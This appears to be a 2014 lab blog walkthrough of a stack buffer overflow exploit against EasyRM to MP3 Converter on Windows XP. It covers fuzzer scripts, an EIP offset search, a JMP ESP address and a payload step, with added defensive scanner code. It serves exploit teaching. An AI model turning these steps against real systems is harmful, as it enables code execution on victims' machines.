Thursday, 30 January 2014

Buffer Overflow: EasyRM to MP3 Converter

Tools
- WinXP (operating system)
- EasyRM to MP3 Converter (target)
- OllyDbg (debugger)
- Fuzzer
- wsf3Web (generate payload)

Run WinXP in VirtualBox
Install EasyRM to MP3 Converter


1. Create the fuzzer
~# nano easyRM.py

#!/opt/bin/python
# write 26100 'A' (0x41) bytes into fuzzer.m3u; open in binary mode so the
# bytes reach the file unchanged
filename = "fuzzer.m3u"
buffer = b"\x41" * 26100
out_file = open(filename, 'wb')
out_file.write(buffer)
out_file.close()


filename is the name of the file that will be created, fuzzer.m3u
buffer = b"\x41" * 26100 fills the file with the character A repeated 26100 times

After that:
# python easyRM.py
This executes easyRM.py and creates fuzzer.m3u.

Start apache2 first, then download fuzzer.m3u in WinXP using the IE browser.






Load fuzzer.m3u in the target and watch what happens.


Alright, EasyRM crashed.
Now debug it with OllyDbg.

The EIP register is filled with 414141
because the string of A's is long enough to overflow the stack and overwrite EIP.
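From the defender's side, the file that causes this crash is easy to recognise: a playlist entry tens of thousands of bytes long, made of one repeated byte. The scanner below is an added example, not code from the original post, that flags such .m3u files; the thresholds and the sample playlists (a normal one plus the two files this post writes) are constructed for illustration.

```python
# Added example, not from the original post: flag .m3u playlists carrying
# the kind of oversized entry described above. Thresholds and samples are
# constructed for illustration.
import re

MAX_ENTRY_LEN = 1024   # real playlist entries (paths, URLs) are far shorter
MIN_RUN_LEN = 64       # a run of one repeated byte this long is not a real path


def scan_m3u(data):
    """Return (line_no, reason) findings for the raw bytes of a playlist."""
    findings = []
    run_re = re.compile(rb"(.)\1{%d,}" % (MIN_RUN_LEN - 1))
    for line_no, line in enumerate(data.splitlines(), start=1):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):   # blank, or #EXTM3U/#EXTINF directive
            continue
        if len(line) > MAX_ENTRY_LEN:
            findings.append((line_no, "entry length %d exceeds %d"
                             % (len(line), MAX_ENTRY_LEN)))
        m = run_re.search(line)
        if m:
            findings.append((line_no, "run of %d x 0x%02x bytes"
                             % (len(m.group(0)), m.group(1)[0])))
        if any(b < 0x20 or b > 0x7e for b in line):
            findings.append((line_no, "non-printable bytes in entry"))
    return findings


# Constructed samples: a normal playlist and the two files the post writes.
BENIGN = (b"#EXTM3U\r\n#EXTINF:201,Song\r\n"
          b"C:\\Music\\song.mp3\r\nhttp://example.com/stream.mp3\r\n")
CRASHER = b"\x41" * 26100
DEADBEEF = b"\x90" * 26070 + b"\xEF\xBE\xAD\xDE" + b"\x90" * 32

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("crasher", CRASHER), ("deadbeef", DEADBEEF)):
        print(name, scan_m3u(sample) or "clean")
```

The length check alone catches the first fuzzer file; the repeated-byte and non-printable checks also catch the later NOP-padded version, which a length threshold tuned too high could miss.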

2. Replace the string "A" with a pattern
# ./pattern_create.rb 26100 > string.txt


Check string.txt and copy its contents into fuzzer.m3u.


After editing easyRM.py, run it and load the new fuzzer.m3u in EasyRM again. Check what happens.






See: we get EIP = 48306C48 and ESP = 2Hl3Hl4H. These values go into pattern_offset.

3. Pattern offset
Use pattern_offset on these values and update the fuzzer:
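To see where the number 26070 comes from, the block below re-implements the cyclic pattern behind pattern_create.rb / pattern_offset.rb in Python. It is an added example, not code from the original post or from Metasploit; the only inputs are the EIP and ESP values the post reports from OllyDbg. The pattern repeats every 26 x 26 x 10 x 3 = 20280 bytes, so with a 26100-byte buffer the four bytes in EIP occur twice, and the offset used by the post is the second occurrence.

```python
# Added example, not from the original post: re-implementation of the
# upper-lower-digit cyclic pattern, to show how a crash EIP maps to an offset.
import string
import struct


def cyclic_pattern(length):
    """Triples 'Aa0Aa1...Zz9', restarted until `length` bytes; period 20280."""
    out = bytearray()
    while len(out) < length:
        for up in string.ascii_uppercase:
            for lo in string.ascii_lowercase:
                for dg in string.digits:
                    out += (up + lo + dg).encode("ascii")
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def find_offsets(pattern, needle):
    """Every offset at which needle occurs (more than one once the pattern wraps)."""
    offsets = []
    pos = pattern.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = pattern.find(needle, pos + 1)
    return offsets


def eip_offsets(pattern, eip_value):
    """EIP holds the 4 bytes little-endian: 0x48306C48 is b'Hl0H' in the file."""
    return find_offsets(pattern, struct.pack("<I", eip_value))


PATTERN = cyclic_pattern(26100)   # same length as the post's fuzzer

if __name__ == "__main__":
    # values the post reads from OllyDbg after loading the pattern file
    print("EIP 0x48306C48 ->", eip_offsets(PATTERN, 0x48306C48))   # [5790, 26070]
    print("ESP '2Hl3Hl4H' ->", find_offsets(PATTERN, b"2Hl3Hl4H"))  # [5798, 26078]
```

The first hit, 5790, is what a pattern shorter than one period would report; because the post's buffer is longer than 20280 bytes, only the second hit, 26070, matches the crash, which is why any offset from a wrapped pattern should be confirmed with a marker value such as the DEADBEEF test in the next step.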




#!/opt/bin/python
# 26070 bytes of padding (0x90) up to EIP, the marker DEADBEEF written
# little-endian so it reads as DEADBEEF in the register, then 32 more bytes
filename = "fuzzer.m3u"
buffer = b"\x90" * 26070
buffer += b"\xEF\xBE\xAD\xDE"
buffer += b"\x90" * 32
out_file = open(filename, 'wb')
out_file.write(buffer)
out_file.close()


OK. After editing easyRM.py, execute it again and download the new fuzzer.m3u to load with EasyRM. After loading, EasyRM will crash; then debug it with OllyDbg.



The EIP register is filled with "DEADBEEF"; this confirms that we control the EIP register.

4. Search for JMP ESP

Run EasyRM and attach OllyDbg.
View > Executable modules > USER32

In the main window: Search for > Command


JMP ESP : 7E429353
5. Set the payload


Generate the payload:




and execute the Python file again


Load the new fuzzer.m3u in EasyRM.
Check with telnet....

